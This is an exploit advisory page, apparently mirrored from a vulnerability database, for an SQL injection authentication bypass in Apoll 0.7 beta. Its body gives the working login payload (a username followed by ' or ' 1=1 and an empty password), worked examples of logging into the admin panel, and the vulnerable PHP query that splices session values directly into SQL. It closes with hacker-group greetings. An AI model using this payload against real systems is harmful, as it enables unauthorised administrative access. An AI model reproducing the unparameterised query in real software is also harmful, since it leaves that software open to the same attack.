Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052150 漏洞类型
发布时间 2009-02-27 更新时间 2009-02-27
CVE编号 CVE-2008-6270
CVE-2008-6272
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020280
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------